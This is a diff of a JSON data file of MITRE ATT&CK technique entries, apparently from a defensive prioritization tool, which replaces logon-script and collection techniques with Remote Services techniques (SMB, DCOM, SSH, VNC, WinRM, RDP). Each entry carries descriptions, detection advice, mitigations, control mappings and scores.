-                "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "tid": "T1021.002",
+                "name": "Remote Services: SMB/Windows Admin Shares",
+                "url": "https://attack.mitre.org/techniques/T1021/002",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
+                "detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             },
             {
-                "tid": "T1037.003",
-                "name": "Boot or Logon Initialization Scripts: Network Logon Script",
-                "url": "https://attack.mitre.org/techniques/T1037/003",
-                "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.",
-                "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "tid": "T1021.003",
+                "name": "Remote Services: Distributed Component Object Model",
+                "url": "https://attack.mitre.org/techniques/T1021/003",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)",
+                "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1048",
+                        "name": "Application Isolation and Sandboxing",
+                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                        "url": "https://attack.mitre.org/mitigations/M1048"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             },
             {
-                "tid": "T1037.004",
-                "name": "Boot or Logon Initialization Scripts: RC Scripts",
-                "url": "https://attack.mitre.org/techniques/T1037/004",
-                "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)",
-                "detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ",
+                "tid": "T1021.004",
+                "name": "Remote Services: SSH",
+                "url": "https://attack.mitre.org/techniques/T1021/004",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.",
+                "detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1037.005",
-                "name": "Boot or Logon Initialization Scripts: Startup Items",
-                "url": "https://attack.mitre.org/techniques/T1037/005",
-                "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.",
-                "detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
+                "tid": "T1021.005",
+                "name": "Remote Services: VNC",
+                "url": "https://attack.mitre.org/techniques/T1021/005",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)",
+                "detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1033",
+                        "name": "Limit Software Installation",
+                        "description": "Block users or groups from installing unapproved software.",
+                        "url": "https://attack.mitre.org/mitigations/M1033"
+                    }
+                ]
+            },
+            {
+                "tid": "T1021.006",
+                "name": "Remote Services: Windows Remote Management",
+                "url": "https://attack.mitre.org/techniques/T1021/006",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)",
+                "detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.  Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.34278039571428576,
-        "adjusted_score": 0.34278039571428576,
-        "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
+        "cumulative_score": 1.5922426661904763,
+        "adjusted_score": 1.5922426661904763,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "2.7",
-            "3.3",
-            "4.1",
-            "5.4",
+            "4.7",
+            "5.3",
             "6.1",
             "6.2",
+            "6.4",
+            "6.5",
             "6.8"
         ],
         "nist_controls": [
             "AC-17",
+            "AC-2",
+            "AC-20",
             "AC-3",
-            "CA-7",
-            "CM-2",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CM-5",
             "CM-6",
-            "CM-7",
-            "SI-3",
-            "SI-4",
-            "SI-7"
-        ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.18571428571428572,
-            "mitigation_score": 0.2909090909090909,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0.00706611
-    },
-    {
-        "tid": "T1039",
-        "name": "Data from Network Shared Drive",
-        "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
-        "url": "https://attack.mitre.org/techniques/T1039",
-        "tactics": [
-            "Collection"
-        ],
-        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-        "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
-            "Network Share: Network Share Access"
+            "IA-2",
+            "IA-5",
+            "SI-4"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.11904761904761905,
-        "adjusted_score": 0.11904761904761905,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.019047619047619046,
-            "detection_score": 0.04
+            "combined_score": 0.4761904761904762,
+            "mitigation_score": 0.34545454545454546,
+            "detection_score": 0.62
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "choke_point_score": 0.45,
+        "prevalence_score": 0.66605219
     },
     {
-        "tid": "T1040",
-        "name": "Network Sniffing",
-        "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
-        "url": "https://attack.mitre.org/techniques/T1040",
+        "tid": "T1021.001",
+        "name": "Remote Services: Remote Desktop Protocol",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)",
+        "url": "https://attack.mitre.org/techniques/T1021/001",
         "tactics": [
-            "Credential Access",
-            "Discovery"
+            "Lateral Movement"
         ],
-        "detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.",
+        "detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
         "platforms": [
-            "Linux",
-            "Network",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
             },
             {
                 "mid": "M1032",
                 "name": "Multi-factor Authentication",
                 "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
                 "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.38142308952380954,
-        "adjusted_score": 0.38142308952380954,
+        "cumulative_score": 0.6857142857142857,
+        "adjusted_score": 0.6857142857142857,
         "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
+            "4.1",
             "4.2",
-            "4.6",
+            "4.4",
+            "4.7",
+            "4.8",
+            "5.3",
+            "6.1",
+            "6.2",
             "6.4",
             "6.5",
-            "3.10"
+            "6.8",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.7",
+            "12.8",
+            "13.5",
+            "13.10",
+            "16.10",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-16",
+            "AC-11",
+            "AC-12",
             "AC-17",
-            "AC-18",
-            "AC-19",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
             "IA-2",
+            "IA-4",
             "IA-5",
-            "SC-4",
-            "SC-8",
-            "SI-12",
-            "SI-4",
-            "SI-7"
+            "IA-6",
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4"
         ],
         "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20952380952380953,
-            "mitigation_score": 0.2909090909090909,
-            "detection_score": 0.12
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0.02189928
+        "hardware_coverage": false
     },
     {
-        "tid": "T1041",
-        "name": "Exfiltration Over C2 Channel",
-        "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
-        "url": "https://attack.mitre.org/techniques/T1041",
+        "tid": "T1021.002",
+        "name": "Remote Services: SMB/Windows Admin Shares",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
+        "url": "https://attack.mitre.org/techniques/T1021/002",
         "tactics": [
-            "Exfiltration"
+            "Lateral Movement"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
+            "Logon Session: Logon Session Creation",
+            "Network Share: Network Share Access",
             "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
             "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
